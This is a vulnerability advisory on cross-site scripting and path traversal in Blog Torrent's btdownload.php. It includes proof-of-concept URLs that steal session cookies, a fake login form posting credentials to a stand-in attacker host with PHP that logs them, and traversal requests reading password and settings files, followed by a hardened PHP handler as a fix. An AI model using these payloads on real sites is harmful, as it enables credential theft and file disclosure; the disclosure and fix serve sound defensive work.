Variable 'file' in Blog Torrent 'btdownload.php':
input validation error (cross-site scripting)
vendor: www.blogtorrent.com/
http://sourceforge.net/tracker/index.php?func=detail&aid=1080615&group_id=109524&atid=654202
Preview Version 0.8
vendor notified: yes   exploit included: yes
impact: execute JavaScript code, remote file inclusion,
remote command execution.
OSVDB ID: 12250, 12251
SecurityTracker: 1012452
####################################
Blog Torrent is a PHP web script for managing
torrent links and users from the blog, among other options.
The variable 'file' in Blog Torrent 'btdownload.php' has an input
validation error that permits inserting JavaScript and executing code,
remote file inclusion and remote command execution.
Proof of concept:
Get the session cookie:
http://[target]/bittorrent_module/btdownload.php?
file=<script>alert(document.cookie)</script>
http://[target]/bittorrent_module/btdownload.php?
file=<script>document.write(document.cookie)</script>
Insert content:
http://[target]/bittorrent_module/btdownload.php?
file=<img%20src=http://www.google.es/images/logo_sm.gif>
Insert a remote web page:
http://[target]/bittorrent_module/btdownload.php?
file=<iframe%20src=http://www.google.es/></iframe>
Insert a form that posts to a remote database:
http://[target]/bittorrent_module/btdownload.php?
file=<form%20action="http://www.atacker.com/savedb.php"%
20method="post">Username:<input%20name="username"%20type=
"text"%20maxlength="30">Password:<input%20name="password"
%20type="text"%20maxlength="30"><input%20name="login"%20
type="submit"%20value="Login"></form>
In sabedb.php I have query strings to save the variables password
and username.
sabedb.php obtains the cookie:
<?php
$archivo = 'tostada.txt';
$fp = fopen($archivo, "a");
$string = "$cookie"; // $cookie comes from the request via register_globals
$write = fputs($fp, $string);
fclose($fp);
?>
and saves it into a txt file,
and saves the user and password:
<?php
// the original was missing the closing parenthesis of the call
mysql_db_query("passwordssss", "insert into $usuario (usuario,pass)
values ('$usuario','$password')");
?>
With this, the values the user puts in are saved in a little database containing
only 2 tables, password & username :)
Disclosure of username and password hash:
http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=../data/users></iframe>
or
http://[target]/torrent_blog/btdownload.php?file=<iframe%20src=http://[target]/torrent_blog/data/users></iframe>
Download arbitrary files from the server or blog:
http://[target]/torrent_blog/btdownload.php?type=torrent&file=[path%file]
http://[target]/torrent_blog/btdownload.php?type=torrent&file=../password.php
http://[target]/torrent_blog/btdownload.php?type=torrent&file=../settings.php
http://[target]/torrent_blog/btdownload.php?type=torrent&file=../login.php
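The two weaknesses above (the 'file' value echoed unescaped into HTML, and the same value joined onto a path with no traversal check) share one fix: validate the parameter against a strict allow-list, confine the resolved path to the torrent directory, and HTML-escape anything that is reflected. The handler below is an added example written for this advisory; it is not Blog Torrent's own code. It assumes torrents live in a ./torrents directory next to the script (hypothetical) and keeps the type=torrent parameter seen in the requests above.

```php
<?php
// Added example, not Blog Torrent's code: hardened handling of the 'file'
// parameter. Assumption: torrent files are stored in ./torrents (hypothetical).
declare(strict_types=1);

// Accept only a bare file name with a .torrent suffix. This rejects "../",
// slashes, NUL bytes and HTML markup before the value touches anything.
function validate_torrent_name(string $name): bool
{
    return (bool) preg_match('/\A[A-Za-z0-9_.-]{1,128}\.torrent\z/', $name)
        && strpos($name, '..') === false;
}

// Resolve the name inside the torrent directory and confirm the canonical
// path is still under that directory (covers symlinks and anything the
// regex might have let through). Returns null when the request is refused.
function resolve_torrent_path(string $baseDir, string $name): ?string
{
    $base = realpath($baseDir);
    if ($base === false || !validate_torrent_name($name)) {
        return null;
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($full === false || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $full;
}

$requested = $_GET['file'] ?? '';
$type      = $_GET['type'] ?? '';

if ($type !== 'torrent') {
    http_response_code(400);
    exit('unsupported type');
}

$path = resolve_torrent_path(__DIR__ . '/torrents', $requested);
if ($path === null) {
    // The raw request is never echoed as-is; if it must appear in HTML it is
    // escaped, which neutralises the <script>/<iframe>/<form> payloads above.
    http_response_code(404);
    exit('No such torrent: ' . htmlspecialchars($requested, ENT_QUOTES | ENT_HTML5, 'UTF-8'));
}

header('Content-Type: application/x-bittorrent');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
header('X-Content-Type-Options: nosniff');
readfile($path);
```

With this in place a request such as file=../settings.php fails the regex and never reaches realpath(), and a request carrying markup is either refused or echoed back as inert text. The realpath() prefix check is deliberately kept even though the regex already excludes separators, so that a later relaxation of the allow-list does not silently reopen the traversal.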
securitytracker url: http://www.securitytracker.com/alerts/2004/Dec/1012452.html
Sincerely,
Lostmon (lostmon@gmail.com)
Thanks to Estrella for being my light.
Thanks to all who believed in me.
--
Curiosity is what makes the mind move...